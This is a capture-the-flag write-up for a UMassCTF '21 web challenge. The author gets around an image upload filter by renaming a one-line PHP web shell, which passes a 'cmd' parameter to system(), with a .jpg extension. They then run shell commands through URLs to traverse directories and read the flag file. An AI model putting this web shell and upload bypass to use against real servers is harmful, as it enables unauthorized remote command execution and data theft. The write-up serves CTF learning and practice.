This is for the UMassCTF ’21 CTF.
Challenge Author: Cobchise#6969
For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

I quick test image upload and I see how it works:

It uploaded the file and give a ling to see it. When I click the link to see it, It essentially prints the contents of the file as if it is text:

This tells me that I need to upload a PHP shell script:
I grab my favorite one-line PHP shell and upload it as a .php file:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.
It took it:

When I click to see the “image” I get this:

No I provide some commands as the expected “cmd” argument:
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt

UMASS{a_picture_paints_a_thousand_shells}